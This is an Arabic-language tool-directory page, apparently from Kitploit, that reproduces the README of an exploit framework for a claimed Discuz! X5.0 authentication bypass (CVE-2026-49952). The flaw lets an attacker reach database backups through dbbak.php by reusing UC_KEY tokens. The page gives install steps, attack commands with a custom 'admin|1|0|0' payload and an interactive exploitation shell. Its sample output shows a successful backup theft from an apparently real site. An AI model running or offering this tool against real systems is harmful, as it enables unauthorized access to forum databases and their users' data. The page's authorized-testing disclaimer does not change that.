Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - ثغرة حرجة تسمح بالوصول إلى النسخ الاحتياطية لقاعدة البيانات دون مصادقة، عبر إعادة استخدام رمز أوراكل التشفيري UC_KEY. درجة الخطورة CVSS 9.1. أداة كاملة الميزات مع كشف الإصدار، وهجمات متعددة الحمولات، وقشرة تفاعلية، واستغلال آلي. للاختبارات المصرح بها فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
المصادقة والترخيصأطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHub

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

عرض المستودع
115منذ 2 أشهرلم تتم المراجعة بعد

حول

Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - ثغرة حرجة تسمح بالوصول إلى النسخ الاحتياطية لقاعدة البيانات دون مصادقة، عبر إعادة استخدام رمز أوراكل التشفيري UC_KEY. درجة الخطورة CVSS 9.1. أداة كاملة الميزات مع كشف الإصدار، وهجمات متعددة الحمولات، وقشرة تفاعلية، واستغلال آلي. للاختبارات المصرح بها فقط.

مشاركة

إطار عمل استغلال تجاوز المصادقة في Discuz! X5.0

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1 (حرجة) | الإصدار 1.0.0

أداة اختبار اختراق احترافية مصممة لاكتشاف وإظهار الثغرة الحرجة الخاصة بتجاوز المصادقة في Discuz! X5.0.

D1

📋 جدول المحتويات

  • ⚠️ إخلاء المسؤولية

  • 🔍 نظرة عامة

  • 🎯 تفاصيل الثغرة

  • ✨ الميزات

  • 📦 التثبيت

  • 🚀 البدء السريع

  • 💻 أمثلة الاستخدام

  • 🖥️ الواجهة التفاعلية

  • 🛡️ اعتبارات أمنية

  • 🔧 استكشاف الأخطاء وإصلاحها

  • 📄 الترخيص


⚠️ إخلاء المسؤولية

إشعار هامهذه الأداة مقدمة لأغراض تعليمية ولاختبارات أمنية مصرح بها فقط.لا تستخدم هذه الأداة على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني وغير أخلاقي.لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناجم عن هذه الأداة.باستخدامك لهذه الأداة، فإنك توافق على الامتثال لجميع القوانين واللوائح المعمول بها.


🔍 نظرة عامة

إطار عمل استغلال تجاوز المصادقة في Discuz! X5.0 مصمم لاكتشاف وإظهار الثغرة الحرجة الخاصة بتجاوز المصادقة (CVE-2026-49952) في إصدارات Discuz! X5.0 الصادرة بين 20 مارس 2026 و1 مايو 2026.

تسمح هذه الثغرة للمهاجمين غير المصادقين بالوصول إلى وظيفة النسخ الاحتياطي لقاعدة البيانات (dbbak.php) من خلال استغلال UC_KEY encryption oracle لإعادة استخدام الرمز المميز، مما قد يعرّض محتويات حساسة من قاعدة البيانات للخطر.

أبرز الملامح

  • 🏆 درجة CVSS: 9.1 (حرجة)

  • 🔐 التأثير: تجاوز المصادقة

  • 📂 الوصول: ملفات النسخ الاحتياطي لقاعدة البيانات

  • ⚡ التعقيد: منخفض (سهل الاستغلال)

  • 🎯 الهدف: Discuz! X5.0 (20260320 - 20260501)


🎯 تفاصيل الثغرة

الملخص الفني

السمةالتفاصيل
نوع الثغرةتجاوز المصادقة
معرف CVECVE-2026-49952
إصدار CVSS3.1
درجة CVSS9.1 (حرجة)
متجه الهجومالشبكة
تعقيد الهجوممنخفض
الصلاحيات المطلوبةلا شيء
تفاعل المستخدملا شيء
تأثير السريةمرتفع
تأثير السلامةمرتفع
تأثير التوافرمرتفع
نضج كود الاستغلالوظيفي
مستوى المعالجةإصلاح رسمي متاح

السبب الجذري

توجد الثغرة في نقطة النهاية dbbak.php حيث تعتمد آلية التحقق من الرمز المميز على UC_KEY encryption oracle. من خلال صياغة حمولة محددة في طلب تسجيل الدخول (member.php)، يمكن للمهاجم الحصول على رمز مصادقة صالح يمكن إعادة استخدامه للوصول إلى وظيفة النسخ الاحتياطي لقاعدة البيانات دون الحصول على تفويض مناسب.

الإصدارات المتأثرة

  • ❌ Discuz! X5.0 (20260320 - 20260501) - قابلة للاستغلال

  • ✅ Discuz! X5.0 (20260510+) - مُصلحة


✨ الميزات

الميزات الأساسية

  • 🔍 اكتشاف الإصدار: بصمة تلقائية وتحديد إصدار Discuz!.

  • ⚡ هجوم متعدد الحمولات: اختبار متوازٍ لعدة متغيرات من الحمولات.

  • 🖥️ واجهة تفاعلية: واجهة سطر أوامر كاملة الميزات للاستغلال اليدوي.

  • 🚀 استغلال آلي: استغلال بنقرة واحدة مع حد أدنى من الإعداد.

  • 📊 حفظ النتائج: تصدير نتائج الاستغلال إلى ملفات بختم زمني.

  • 🌐 دعم الوكيل (Proxy): إعداد وكيل HTTP/HTTPS للتنقل عبر الشبكة.

  • 🎯 فحص متعدد الخيوط: عدد خيوط قابل للضبط لتحسين الأداء.

  • 🎨 مخرجات ملونة: مخرجات طرفية احترافية مرمّزة بالألوان.

ميزات متقدمة

  • 🔐 دعم SSL/TLS: يتعامل مع أهداف HTTP وHTTPS.

  • 🔄 إدارة الجلسات: يحافظ على حالة جلسة مستمرة.

  • 📦 تخصيص الحمولة: دعم حقن حمولات مخصصة.

  • 🎯 التحقق من الهدف: يتحقق من تثبيت Discuz! قبل الاستغلال.


📦 التثبيت

المتطلبات الأساسية

  • Python: الإصدار 3.7 أو أحدث

  • Pip: مدير حزم Python

التثبيت من المصدر

# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# Install required packages
pip install -r requirements.txt

# Verify installation
python3 exploit.py --help

التثبيت باستخدام Docker

# Build the Docker image
docker build -t exploit .

# Run the container
docker run -it --rm exploit http://target.com

🚀 البدء السريع

الاستخدام الأساسي

# Simple exploitation
python3 exploit.py http://target.com

# With output file
python3 exploit.py http://target.com --output results.txt

# Verbose mode for debugging
python3 exploit.py http://target.com --verbose

الاستخدام المتقدم

# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 أمثلة الاستخدام

مثال 1: استغلال أساسي

python3 exploit.py http://discuz.eda.com.my
📤 المخرجات المتوقعة
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  EXPLOIT SUCCESSFUL                                      ║
╠══════════════════════════════════════════════════════════╣
║  Target: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  Status: Database backup accessed                        ║
║  Data Size: 24567 bytes                                  ║
║  Saved to: discuz_exploit_20260724_143218.txt            ║
╚══════════════════════════════════════════════════════════╝

🖥️ الواجهة التفاعلية

ابدأ الواجهة التفاعلية للاستغلال اليدوي:

python3 discuz_exploit.py http://target.com --interactive

الأوامر المتاحة

الأمرالوصفالمثال
helpعرض جميع الأوامر المتاحةhelp
scanاكتشاف إصدار Discuz! والتحقق من الثغرةscan
get [payload]استخراج authcode (حمولة مخصصة اختيارية )`get admin
exploit [op]تنفيذ الاستغلال (الافتراضي: backup)exploit backup
saveحفظ النتائج في ملفsave
infoعرض معلومات الجلسةinfo
clearمسح شاشة الطرفيةclear
exit / quitالخروج من الواجهة التفاعليةexit

🛡️ اعتبارات أمنية

✅ الأمور المسموحة

  • استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

  • احصل على تفويض كتابي قبل الاختبار.

تنزيل الأداة